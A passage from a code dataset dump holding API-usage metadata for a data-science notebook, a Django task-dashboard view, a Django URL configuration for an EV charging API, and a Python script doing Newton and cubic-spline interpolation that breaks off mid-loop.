"matplotlib.pyplot", "line_number": 291, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 306, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 306, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 307, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 320, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 321, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 321, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 322, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 322, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 323, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 323, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 337, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 338, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 338, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 339, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 339, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 340, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 347, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 347, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 348, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 348, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 349, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 349, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 358, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 358, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 359, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 359, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 360, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 360, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 361, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 361, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 362, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 362, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 369, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 369, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 370, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 370, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 371, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 371, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 372, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 372, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 373, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 373, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 382, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 383, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 383, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 384, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 384, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 391, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 391, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 406, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 406, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 407, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 407, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 408, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 408, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 451, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 451, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 452, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 453, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 454, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 490, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 490, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 498, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 498, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 499, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 499, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 500, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 500, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 501, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 501, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 502, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 502, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 509, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 509, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 510, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 510, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 511, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 511, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 512, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 512, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 513, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 513, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 521, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 521, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 522, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 522, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 523, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 523, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 524, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 524, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 525, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 525, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 532, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 532, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 533, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 533, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 534, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 534, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 535, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 535, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 536, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 536, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 543, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 543, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 544, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 544, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 545, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 545, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 546, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 546, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 547, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 547, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 554, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 554, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 555, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 555, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 556, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 556, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 557, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 557, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 558, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 558, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 605, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 605, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 606, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 606, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 607, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 607, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 608, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 608, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 614, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 614, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 615, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 615, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 616, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 616, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 617, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 617, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 626, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 626, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 627, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 627, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 628, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 628, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 629, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 629, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 657, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 657, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 658, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 658, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 659, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 660, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 660, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 675, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 675, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 678, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 678, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 681, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 681, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 691, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 691, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 699, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 699, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 709, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 709, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 717, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 717, "usage_type": "name"}, {"api_name": "pandas.merge", "line_number": 732, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 740, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 740, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 741, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 741, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 742, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 743, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 743, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 773, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 774, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 782, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 816, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 829, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 895, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 920, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 942, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 956, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 990, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 1000, "usage_type": "call"}, {"api_name": "scipy.stats.uniform", "line_number": 1001, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 1002, "usage_type": "call"}, {"api_name": "scipy.stats.uniform", "line_number": 1003, "usage_type": "call"}, {"api_name": "lightgbm.reset_parameter", "line_number": 1010, "usage_type": "call"}, {"api_name": "lightgbm.LGBMClassifier", "line_number": 1015, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 1016, "usage_type": "call"}, {"api_name": "lightgbm.LGBMClassifier", "line_number": 1030, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 1045, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 1046, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1055, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 1060, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1061, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1061, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.barh", "line_number": 1062, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1062, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 1063, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1063, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 1064, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1064, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1065, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1065, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 1066, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1066, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 1073, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 1075, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1084, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 1105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 1106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1107, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1116, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 1118, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 1119, "usage_type": "call"}, {"api_name": "lightgbm.LGBMClassifier", "line_number": 1133, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 1139, "usage_type": "call"}, {"api_name": "sklearn.ensemble.VotingClassifier", "line_number": 1160, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 1166, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 1193, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 1198, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.Parallel", "line_number": 1204, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.delayed", "line_number": 1205, "usage_type": "call"}, {"api_name": "sklearn.base.clone", "line_number": 1205, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 1217, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 1222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1233, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 1239, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 1240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1248, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1248, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1249, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1249, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1250, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1250, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 1251, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1251, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 1252, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1252, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1253, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1262, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 1264, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 1265, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1285, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1288, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1297, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1299, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1301, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1303, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1307, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1310, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1318, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1319, "usage_type": "name"}]} +{"seq_id": "19575685423", "text": "from django.shortcuts import render\nfrom task_manager.tasks.models import Task\nfrom task_manager.projects.models import Project\n\n\ndef dashboard_view(request):\n # Общие данные\n total_tasks = Task.objects.count()\n total_open_tasks = Task.objects.exclude(status__name=\"завершена\").count()\n\n # Данные по проектам\n projects_data = []\n for project in Project.objects.all():\n project_tasks = Task.objects.filter(project=project)\n project_open_tasks = project_tasks.exclude(status__name=\"завершена\")\n projects_data.append({\n 'project_name': project.name,\n 'total_tasks': project_tasks.count(),\n 'open_tasks': project_open_tasks.count(),\n })\n\n context = {\n 'total_tasks': total_tasks,\n 'total_open_tasks': total_open_tasks,\n 'projects': projects_data,\n }\n\n return render(request, 'task_manager/dashboard.html', context)\n", "repo_name": "NikGor/TaskManager", "sub_path": "task_manager/dashboard/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 965, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "task_manager.tasks.models.Task.objects.count", "line_number": 8, "usage_type": "call"}, {"api_name": "task_manager.tasks.models.Task.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "task_manager.tasks.models.Task", "line_number": 8, "usage_type": "name"}, {"api_name": "task_manager.tasks.models.Task.objects.exclude", "line_number": 9, "usage_type": "call"}, {"api_name": "task_manager.tasks.models.Task.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "task_manager.tasks.models.Task", "line_number": 9, "usage_type": "name"}, {"api_name": "task_manager.projects.models.Project.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "task_manager.projects.models.Project.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "task_manager.projects.models.Project", "line_number": 13, "usage_type": "name"}, {"api_name": "task_manager.tasks.models.Task.objects.filter", "line_number": 14, "usage_type": "call"}, {"api_name": "task_manager.tasks.models.Task.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "task_manager.tasks.models.Task", "line_number": 14, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "14829944383", "text": "from django.urls import path\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\nfrom .views import UserRegisterView, UserLoginView, UserProfileView, UserView, BookingViewSet, PaymentViewSet\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"EV Charging Locator API\",\n default_version='v1',\n description=\"EV Charging Locator API\",\n terms_of_service=\"\",\n contact=openapi.Contact(email=\"\"),\n license=openapi.License(name=\"\"),\n ),\n public=True,\n permission_classes=[permissions.AllowAny],\n)\nurlpatterns = [\n path('swagger', schema_view.without_ui(cache_timeout=0), name='schema-json'),\n path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path('redoc/', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'),\n path('register/', UserRegisterView.as_view(), name='user-register'),\n path('login/', UserLoginView.as_view(), name='user-login'),\n path('profile/', UserProfileView.as_view(), name='user-profile'),\n path('user/', UserView.as_view(), name='user'),\n path('bookings/', BookingViewSet.as_view({'post': 'create', 'get': 'list'}), name='bookings-list'),\n path('bookings//', BookingViewSet.as_view({'get': 'retrieve', 'put': 'update', 'delete': 'destroy'}), name='bookings-detail'),\n path('payment/', PaymentViewSet.as_view({'post': 'create'}), name='payment-create'),\n]\n \n \n", "repo_name": "nbanda2023/evproject", "sub_path": "api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "drf_yasg.views.get_schema_view", "line_number": 12, "usage_type": "call"}, {"api_name": "drf_yasg.openapi.Info", "line_number": 13, "usage_type": "call"}, {"api_name": "drf_yasg.openapi", "line_number": 13, "usage_type": "name"}, {"api_name": "drf_yasg.openapi.Contact", "line_number": 18, "usage_type": "call"}, {"api_name": "drf_yasg.openapi", "line_number": 18, "usage_type": "name"}, {"api_name": "drf_yasg.openapi.License", "line_number": 19, "usage_type": "call"}, {"api_name": "drf_yasg.openapi", "line_number": 19, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 22, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "views.UserRegisterView.as_view", "line_number": 28, "usage_type": "call"}, {"api_name": "views.UserRegisterView", "line_number": 28, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "views.UserLoginView.as_view", "line_number": 29, "usage_type": "call"}, {"api_name": "views.UserLoginView", "line_number": 29, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "views.UserProfileView.as_view", "line_number": 30, "usage_type": "call"}, {"api_name": "views.UserProfileView", "line_number": 30, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "views.UserView.as_view", "line_number": 31, "usage_type": "call"}, {"api_name": "views.UserView", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "views.BookingViewSet.as_view", "line_number": 32, "usage_type": "call"}, {"api_name": "views.BookingViewSet", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "views.BookingViewSet.as_view", "line_number": 33, "usage_type": "call"}, {"api_name": "views.BookingViewSet", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "views.PaymentViewSet.as_view", "line_number": 34, "usage_type": "call"}, {"api_name": "views.PaymentViewSet", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "2252701539", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom math import sqrt\r\n\r\n# data from file 8\r\nx_points = np.array([ -1.2000000e+001,\r\n -1.0000000e+001,\r\n -8.0000000e+000,\r\n -6.0000000e+000,\r\n -4.0000000e+000,\r\n -2.0000000e+000,\r\n 0.0000000e+000,\r\n 2.0000000e+000,\r\n 4.0000000e+000,\r\n 6.0000000e+000,\r\n 8.0000000e+000])\r\n\r\ny_points = np.array([ -4.7169811e-002,\r\n -2.8571429e-002,\r\n -2.3809524e-002,\r\n -4.5454545e-002,\r\n-1.0000000e-001,\r\n -1.6666667e-001,\r\n-1.0000000e-001,\r\n -4.5454545e-002,\r\n -2.3809524e-002,\r\n-1.4285714e-002,\r\n -9.4339623e-003])\r\n\r\n\r\ndef divided_diff(x, y):\r\n n = len(y)\r\n coef = np.zeros([n, n])\r\n\r\n coef[:, 0] = y\r\n\r\n for j in range(1, n):\r\n for i in range(n - j):\r\n coef[i][j] = \\\r\n (coef[i + 1][j - 1] - coef[i][j - 1]) / (x[i + j] - x[i])\r\n\r\n return coef\r\n\r\ndef newton_poly(coef, x_data, x):\r\n n = len(x_data) - 1\r\n p = coef[n]\r\n for k in range(1,n+1):\r\n p = coef[n-k] + (x -x_data[n-k])*p\r\n return p\r\n\r\n\r\na_s = divided_diff(x_points, y_points)[0, :]\r\n\r\nx_new = np.arange(-12, 8.1, .1)\r\ny_new = newton_poly(a_s, x_points, x_new)\r\n\r\ndef cubic_interp1d(x0, x, y):\r\n\r\n x = np.asfarray(x)\r\n y = np.asfarray(y)\r\n\r\n if np.any(np.diff(x) < 0):\r\n indexes = np.argsort(x)\r\n x = x[indexes]\r\n y = y[indexes]\r\n\r\n size = len(x)\r\n\r\n xdiff = np.diff(x)\r\n ydiff = np.diff(y)\r\n\r\n Li = np.empty(size)\r\n Li_1 = np.empty(size-1)\r\n z = np.empty(size)\r\n\r\n Li[0] = sqrt(2*xdiff[0])\r\n Li_1[0] = 0.0\r\n B0 = 0.0\r\n z[0] = B0 / Li[0]\r\n\r\n for i 